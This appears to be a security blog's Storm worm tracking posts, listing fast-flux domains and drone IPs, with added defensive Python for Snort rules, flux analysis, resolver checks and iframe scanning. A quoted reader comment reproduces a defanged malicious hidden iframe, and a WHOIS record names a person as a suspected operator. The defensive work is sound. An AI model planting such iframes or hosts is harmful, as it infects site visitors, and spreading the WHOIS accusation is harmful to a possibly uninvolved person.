Thursday, June 19, 2008

CME711's latest SE Spam

The Storm worm operators have recently updated both their spam and their web content. The landing page (screen capture to the right) is shown in its entirety; its only job is to get the visitor to download and run a malicious file, beijing.exe.

For the last couple of months the Storm domains have been less fast-fluxy: the answers change roughly every 60 seconds instead of with every request. Perhaps the pool of flux nodes is simply too small, or perhaps it's because too many people are hitting the DNS servers and effectively denying service to them.

Regardless, we've spotted the following domains in use:

biztech-co.cn
ratedhot.cn
fconnorlaw.cn
pacoast.cn
cadeaux-avenue.cn
likenewvideos.com
tellicolakerealty.cn
activeware.cn
grupogaleria.cn
polkerdesign.cn


Please update your IDS accordingly.
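As an added example (not code from the DISOG page or from the Storm tracking effort), the following Python turns the domain list above into one Snort DNS-query signature per domain. The interesting part is encoding each name the way it actually appears on the wire (length-prefixed labels, zero terminator), which is what a `content:` match against a UDP/53 payload has to contain. Snort 2.x rule syntax is assumed; the `msg` text, `classtype` and the 9000001+ sid range are our own choices.

```python
import re

# Constructed input: the ten domains listed in the post above.
STORM_DOMAINS = [
    "biztech-co.cn", "ratedhot.cn", "fconnorlaw.cn", "pacoast.cn",
    "cadeaux-avenue.cn", "likenewvideos.com", "tellicolakerealty.cn",
    "activeware.cn", "grupogaleria.cn", "polkerdesign.cn",
]

# LDH label: letters, digits, hyphen; no leading/trailing hyphen; <= 63 bytes.
LABEL_RE = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$")


def dns_labels(domain: str) -> list[str]:
    """Split a hostname into validated, lower-cased DNS labels."""
    labels = domain.strip().rstrip(".").lower().split(".")
    for lab in labels:
        if not LABEL_RE.match(lab):
            raise ValueError(f"invalid DNS label {lab!r} in {domain!r}")
    return labels


def dns_wire_name(domain: str) -> bytes:
    """Encode a name as it appears in a DNS packet: each label prefixed by its
    length, terminated by a zero-length label. No compression pointers: the
    QNAME in the question section is never compressed."""
    return b"".join(bytes([len(lab)]) + lab.encode("ascii")
                    for lab in dns_labels(domain)) + b"\x00"


def snort_content(domain: str) -> str:
    """Render the wire-format name as a Snort content string, mixing text
    labels with |hex| length bytes, e.g. |0A|biztech-co|02|cn|00|."""
    return "".join(f"|{len(lab):02X}|{lab}" for lab in dns_labels(domain)) + "|00|"


def snort_rule(domain: str, sid: int) -> str:
    """One alert rule per domain. The |01 00 00 01| anchor at offset 2 is the
    flags word (standard query, RD=1) followed by QDCOUNT=1, which limits the
    match to client queries so the name content does not also fire on replies."""
    return (
        f'alert udp $HOME_NET any -> any 53 ('
        f'msg:"STORM fast-flux domain query {domain}"; '
        f'content:"|01 00 00 01|"; offset:2; depth:4; '
        f'content:"{snort_content(domain)}"; nocase; '
        f'classtype:trojan-activity; sid:{sid}; rev:1;)'
    )


def build_rules(domains=STORM_DOMAINS, first_sid: int = 9000001) -> list[str]:
    """Assign consecutive sids so the rule file loads without duplicates."""
    return [snort_rule(d, first_sid + i) for i, d in enumerate(domains)]


if __name__ == "__main__":
    print("\n".join(build_rules()))
```

The flags/QDCOUNT anchor is the same trick the public Emerging Threats DNS rules use; drop it if you also want to alert on responses carrying these names (for example from a resolver cache poisoned with them).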


Tuesday, October 16, 2007

0.0.0.0 - UPDATED.

Once again, the CME711 (Storm) domains are all resolving to 0.0.0.0, which in the past has meant that another change in the campaign is imminent.

What will it be this time? Baseball? My home team has just swept the Diamondbacks and made it to the World Series. Congratulations to the Colorado Rockies! The last 22 games have been outstanding!

---

Update from Randy V:
They are back in full force. A nearly complete turnover of the active list from yesterday:
190.128.76.140 200.127.196.112 201.235.46.246 24.126.26.18 67.190.138.189 68.113.78.23 68.57.236.13 68.76.98.212 69.230.199.160 70.243.202.40 70.244.102.159 74.139.41.221 76.100.35.250 76.226.146.196 76.73.135.17 85.187.86.249 88.74.161.197
and the currently active list:
209.102.175.61 219.115.223.181 24.178.197.7 24.178.99.202 24.210.99.223 24.235.140.159 61.84.67.116 67.64.104.4 68.76.98.212 69.151.234.219 71.79.181.218 72.128.41.234 72.128.61.29 72.160.184.227 74.140.168.34 76.216.62.73 76.226.146.196 76.99.89.48 77.197.44.76 84.174.112.145 84.42.164.6 89.112.20.242 98.195.153.198 98.197.63.176
Only 201.235.46.246, 68.76.98.212 and 76.226.146.196 are in common. 76.226.146.196 is probably only a proxy.

Baseball does sound like a ripe target. There has not been a page change yet.

Update 2 (from Nicholas):
OpenDNS is null routing all CME711 domains. You can protect yourself from some of the effects of this trojan by changing your domain servers to 208.67.222.222 and 208.67.220.220. For more information visit the OpenDNS website.


Saturday, September 08, 2007

Stormworm Tactics Change to Football Fungus

Some recent changes involving Storm:

Starting at about 13:50 GMT, Randy V noticed that the domains had begun rotating their IPs less frequently. Looking back at my logs, I came up with this:

2007-09-08 13:49 (GMT): 12.216.204.171
2007-09-08 13:49 (GMT) - 2007-09-08 13:57 (GMT): 208.115.203.105
2007-09-08 13:58 (GMT) - 2007-09-08 14:03 (GMT): 76.226.146.196
2007-09-08 14:04 (GMT) - 2007-09-08 14:20 (GMT): 72.40.18.87
2007-09-08 14:21 (GMT) - 2007-09-08 14:30 (GMT): 209.30.158.167
2007-09-08 14:31 (GMT) - 2007-09-08 14:49 (GMT): 70.129.33.116
2007-09-08 14:50 (GMT) - 2007-09-08 15:15 (GMT): 74.73.209.16
2007-09-08 15:17 (GMT) - 2007-09-08 15:26 (GMT): 121.114.132.128
2007-09-08 15:26 (GMT) - 2007-09-08 15:34 (GMT): 75.132.218.100
2007-09-08 15:35 (GMT) - 2007-09-08 15:43 (GMT): 75.66.243.62
2007-09-08 15:44 (GMT) - NOW: 127.0.0.1
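As an added example (not code from the DISOG page), the following Python parses the log above, measures how long each answer stayed in place, and flags answers that cannot be real drones: 127.0.0.1 here, and the 0.0.0.0 placeholder reported in the October update further up the page. It is the same measurement that would expose the roughly 60-second rotation described in the June 2008 note at the top of the page. The 17:00 GMT cut-off used for the still-open last entry is taken from the next sentence of the post and is otherwise an assumption.

```python
import re
import statistics
from datetime import datetime
from ipaddress import ip_address

# Constructed input: the resolution log from the post above, one entry per line.
FLUX_LOG = """\
2007-09-08 13:49 (GMT): 12.216.204.171
2007-09-08 13:49 (GMT) - 2007-09-08 13:57 (GMT): 208.115.203.105
2007-09-08 13:58 (GMT) - 2007-09-08 14:03 (GMT): 76.226.146.196
2007-09-08 14:04 (GMT) - 2007-09-08 14:20 (GMT): 72.40.18.87
2007-09-08 14:21 (GMT) - 2007-09-08 14:30 (GMT): 209.30.158.167
2007-09-08 14:31 (GMT) - 2007-09-08 14:49 (GMT): 70.129.33.116
2007-09-08 14:50 (GMT) - 2007-09-08 15:15 (GMT): 74.73.209.16
2007-09-08 15:17 (GMT) - 2007-09-08 15:26 (GMT): 121.114.132.128
2007-09-08 15:26 (GMT) - 2007-09-08 15:34 (GMT): 75.132.218.100
2007-09-08 15:35 (GMT) - 2007-09-08 15:43 (GMT): 75.66.243.62
2007-09-08 15:44 (GMT) - NOW: 127.0.0.1
"""

TS = r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}"
ENTRY_RE = re.compile(
    rf"^(?P<start>{TS}) \(GMT\)"
    rf"(?: - (?:(?P<end>{TS}) \(GMT\)|(?P<open>NOW)))?"
    r": (?P<ip>\S+)$"
)


def classify(ip: str) -> str:
    """Answers that cannot point at a drone: loopback (127.0.0.1), the
    'no address' placeholder (0.0.0.0) or RFC 1918 space."""
    addr = ip_address(ip)
    if addr.is_loopback:
        return "loopback"
    if addr.is_unspecified:
        return "unspecified"
    if addr.is_private:
        return "private"
    return "public"


def parse_entry(line: str, now: datetime) -> dict:
    m = ENTRY_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparsable log line: {line!r}")
    start = datetime.strptime(m["start"], "%Y-%m-%d %H:%M")
    if m["open"]:
        end, is_open = now, True                         # still the current answer
    elif m["end"]:
        end, is_open = datetime.strptime(m["end"], "%Y-%m-%d %H:%M"), False
    else:
        end, is_open = start, False                      # seen once: dwell < 1 min
    return {
        "ip": m["ip"], "kind": classify(m["ip"]), "start": start, "end": end,
        "open": is_open, "dwell_min": int((end - start).total_seconds() // 60),
    }


def flux_report(log: str, now: datetime) -> dict:
    entries = [parse_entry(ln, now) for ln in log.splitlines() if ln.strip()]
    # Completed dwells only: a single sighting (0 min) would bias the rotation
    # period downwards and the still-open entry would bias it upwards.
    closed = [e["dwell_min"] for e in entries if not e["open"] and e["dwell_min"] > 0]
    return {
        "entries": entries,
        "distinct_ips": len({e["ip"] for e in entries}),
        "median_dwell_min": statistics.median(closed),
        "mean_dwell_min": round(statistics.mean(closed), 1),
        "sentinels": [e["ip"] for e in entries if e["kind"] != "public"],
    }


def analyse_post_log() -> dict:
    """The log above, cut off at 17:00 GMT (assumption, see lead-in)."""
    return flux_report(FLUX_LOG, now=datetime(2007, 9, 8, 17, 0))


if __name__ == "__main__":
    report = analyse_post_log()
    for e in report["entries"]:
        print(f'{e["start"]:%H:%M} {e["ip"]:<16} {e["dwell_min"]:>3} min  {e["kind"]}')
    print("median dwell:", report["median_dwell_min"], "min;",
          "sentinels:", report["sentinels"])
```

Run against a longer capture, a median dwell of about a minute with a large pool of distinct public addresses is the fast-flux signature; a sudden run of sentinel answers (127.0.0.1, 0.0.0.0) is the "change is coming" signal the October post describes.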

From 15:44 to ~17:00 the index page showed:

Welcome to nginx!

Now the index page is NFL themed (and nicely done) and serves NFLTracker.exe (detected as Trojan.Peed.III). It does not use any of the XOR-obfuscated JavaScript or browser exploits; this page is strictly social engineering.

(DISOG Screen Capture: Sept 8, 2007)

Our guess is that the domains will change soon to football-related names, or that there will be mass compromise of football-related sites with iframes pointing to the pages hosted on the peers.

UPDATE: Binary is now called 'tracker.exe'


Sunday, August 12, 2007

Storm/Peed Nameserver Update

DISOG researcher Randy Vaughn has identified a new wrinkle with the Storm worm nameservers: 364 of the identified nameservers are now functioning as open resolvers, that is, they will recurse and answer for any name from any client, not just for the Storm domains they host.

It is likely the storm gang may be preparing poisoned name servers operating behind network perimeters. If they did that they could use network sensitive IPs in order to mask the fact that infected users have had their network settings altered. If the machine owner was aware enough to examine their network settings they might overlook the presence of an IP within their ISP's address space as a DNS IP. I know my initial reaction would be, "oh Grandecom changed the DHCP provided DNS IPs once again", rather than, "hey, that IP doesn't look right." Were I to check the listed, but compromised, name server I would more than likely only verify that CNN went to CNN, and Apple.com went to Apple. I might not think to verify that mybank.com actually went to mybank. Please pay special attention to those SSL Certificates! Storm, all by itself, could cause widely-dispersed financial loss on a large scale; I wouldn't put it past the Storm team to launch targeted phishing attacks in the near future.
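Both checks this scenario calls for, whether a server recurses for outsiders (the open-resolver finding above) and whether a resolver's answers for a known site match a trusted reference (the poisoning worry in this paragraph), can be scripted. The following is an added example, not DISOG's code: it builds a recursive A query in DNS wire format, parses the reply header and answer section, and classifies the server. The canned replies, the reference address 192.0.2.10 and the query name are constructed; `probe()` performs the same check against a live server.

```python
import socket
import struct


def build_query(qname: str, txid: int = 0x1234) -> bytes:
    """Standard query with RD=1 (please recurse), one A/IN question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    name = b"".join(bytes([len(lab)]) + lab.encode("ascii")
                    for lab in qname.rstrip(".").split(".")) + b"\x00"
    return header + name + struct.pack("!HH", 1, 1)        # QTYPE=A, QCLASS=IN


def parse_header(pkt: bytes) -> dict:
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    return {"id": txid, "qr": bool(flags & 0x8000), "aa": bool(flags & 0x0400),
            "rd": bool(flags & 0x0100), "ra": bool(flags & 0x0080),
            "rcode": flags & 0x000F, "qdcount": qd, "ancount": an}


def skip_name(pkt: bytes, off: int) -> int:
    """Advance past a (possibly compressed) name; a pointer ends the name."""
    while True:
        length = pkt[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:
            return off + 2
        off += 1 + length


def answer_ips(pkt: bytes) -> list[str]:
    """Collect A-record addresses from the answer section."""
    h = parse_header(pkt)
    off = 12
    for _ in range(h["qdcount"]):
        off = skip_name(pkt, off) + 4                       # QTYPE + QCLASS
    ips = []
    for _ in range(h["ancount"]):
        off = skip_name(pkt, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        if rtype == 1 and rclass == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(pkt[off:off + 4]))
        off += rdlen
    return ips


def assess(query: bytes, resp: bytes, expected_ips: set[str]) -> str:
    """'refused'       - will not recurse for us (not an open resolver)
       'open-resolver' - recursed, and the answer matches the trusted reference
       'poisoned?'     - recursed, but returned addresses we do not expect"""
    h = parse_header(resp)
    if h["id"] != struct.unpack("!H", query[:2])[0]:
        raise ValueError("transaction id mismatch: not a reply to our query")
    if not (h["qr"] and h["ra"] and h["rcode"] == 0 and h["ancount"] > 0):
        return "refused"
    return "open-resolver" if set(answer_ips(resp)) <= expected_ips else "poisoned?"


def probe(server: str, qname: str, expected_ips: set[str], timeout: float = 2.0) -> str:
    """Live check over UDP (needs network; not exercised by the canned cases)."""
    q = build_query(qname)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(q, (server, 53))
        resp, _ = s.recvfrom(4096)
    return assess(q, resp, expected_ips)


# Constructed replies to build_query("www.example.com", 0x1234).
QUERY = build_query("www.example.com")
QUESTION = QUERY[12:]


def canned_response(flags: int, rdata: bytes = b"") -> bytes:
    """Echo the question; optionally add one A record via a 0xC00C name pointer."""
    pkt = struct.pack("!HHHHHH", 0x1234, flags, 1, 1 if rdata else 0, 0, 0) + QUESTION
    if rdata:
        pkt += b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, 300, 4) + rdata
    return pkt


TRUSTED = {"192.0.2.10"}                                   # assumed reference answer
OPEN_OK = canned_response(0x8180, socket.inet_aton("192.0.2.10"))      # QR|RD|RA, NOERROR
OPEN_BAD = canned_response(0x8180, socket.inet_aton("76.226.146.196"))  # answer is a Storm IP
REFUSED = canned_response(0x8105)                          # QR|RD, RCODE=5 (REFUSED), no RA

if __name__ == "__main__":
    for label, resp in (("ok", OPEN_OK), ("bad", OPEN_BAD), ("refused", REFUSED)):
        print(label, "->", assess(QUERY, resp, TRUSTED))
```

For a real check, take `expected_ips` from a resolver you trust (queried over a path the suspect resolver cannot touch), and remember that a CDN-fronted site legitimately returns different addresses from different vantage points, so compare against the answer's network rather than a single address where that applies.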

Of course there are other, much scarier things these guys could be planning.

I am not a big fan of customer blocks, but I feel this case warrants blocking inbound port 53 (TCP/UDP) and outbound port 25 (TCP) traffic immediately.

Jeff Kell reminds us that this could be quite a subtle attack vector weeks or months down the road, even if the machine was cleaned of all malware.


Saturday, August 11, 2007

Behold, the power of Storm

As expected, the Storm botnet has been gaining strength over the last 6 weeks. Current estimates range from hundreds of thousands to a million drones.

Stormworm has been our primary focus over the last few weeks as well.

To date, DISOG has uncovered over

14376 unique storm related binaries,
3118 unique Storm Serving IPs,
258 supernode peers,
85 unique nameservers,
and 13 fast flux domains.

In total, we've identified 3420 unique IP addresses that have been under control of the stormworm author(s), and identifying themselves in one form or another. There are likely hundreds of thousands more drones that we are totally unaware of!

One of the Storm worm fast-flux domains appears not to be behind WHOIS privacy protection. I'm unclear whether this is a slip-up or a setup, but it's interesting!
Domain Name: LTBREW.COM
Registrar: ESTDOMAINS, INC.
Whois Server: whois.estdomains.com
Referral URL: http://www.estdomains.com
Registrant:
Daniel Korwel (noviymoyma@yahoo.com)
N/A
Los-Angeles
CALI,53313
US
Tel. +1.3235212327

Keep posted, we will continue to update this page as we learn more.

Reader Comment (pre-site-change):

The following code was injected into 4 of my websites:
------------------------------------
<iframe src="http://kqfloat.xxxcom/ind.php" alt="BYDLOSHKA" height="1" width="1"></iframe>
------------------------------------
Remove the xxx in the domain name to get the virus/trojan horse in
your computer.
They use several other domains to host the Virus or Trojan Horse. When
I check the Whois all were PrivacyProtected, except one. snlilac.com
shows the owner: http://www.whois.net/whois_new.cgi?d=snlilac&tld=com
When I search on "Daniel Korwel" in Google I found this news article.

This tells me that the hack of my websites is part of this Storm Botnet.
So I assume they have expanded from email to infiltrating websites to spread out the Worm.
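Following up on the comment above, here is an added example (not the commenter's or DISOG's code) of a small scanner for the kind of injection described: it parses HTML and reports iframes that are 1x1 or smaller, hidden by CSS, or sourced from a host outside the site's own allow-list. The sample page, the allow-list (www.example.org) and the local hidden iframe are constructed; the first iframe is the one quoted in the comment, still defanged as the commenter posted it.

```python
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlsplit


def is_tiny(value) -> bool:
    """A width/height of 0 or 1 (with or without 'px') is a hiding technique."""
    if value is None:
        return False
    try:
        return float(value.strip().lower().removesuffix("px")) <= 1
    except ValueError:
        return False


class IframeAudit(HTMLParser):
    """Report <iframe> tags that are invisible or pull content from a host the
    site owner does not control."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = (urlsplit(src).hostname or "").lower()
        reasons = []
        if is_tiny(a.get("width")) and is_tiny(a.get("height")):
            reasons.append("1x1 or smaller")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        if host and host not in self.allowed:
            reasons.append(f"third-party host {host}")
        if reasons:
            self.findings.append({"line": self.getpos()[0], "src": src, "reasons": reasons})


def audit_html(html: str, allowed_hosts) -> list[dict]:
    parser = IframeAudit(allowed_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings


def audit_tree(root, allowed_hosts, suffixes=(".html", ".htm", ".php")) -> dict:
    """Walk a web root and audit every page/template file; returns {path: findings}."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = audit_html(path.read_text(errors="replace"), allowed_hosts)
            if hits:
                results[str(path)] = hits
    return results


# Constructed sample page. Line 3 is the iframe from the comment above.
SAMPLE_HTML = """\
<html><body>
<h1>Welcome</h1>
<iframe src="http://kqfloat.xxxcom/ind.php" alt="BYDLOSHKA" height="1" width="1"></iframe>
<p>Real content.</p>
<iframe src="https://www.example.org/embed" width="640" height="360"></iframe>
<iframe src="/local/widget.html" style="display: none"></iframe>
</body></html>
"""


def audit_sample() -> list[dict]:
    return audit_html(SAMPLE_HTML, allowed_hosts={"www.example.org"})


if __name__ == "__main__":
    for f in audit_sample():
        print(f'line {f["line"]}: {f["src"]} -> {", ".join(f["reasons"])}')
```

Because injected iframes are usually appended to every page by a script run with the web account's credentials, running `audit_tree()` over the whole document root (templates and PHP includes as well as static HTML) finds the copies a browser view of the home page would miss.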
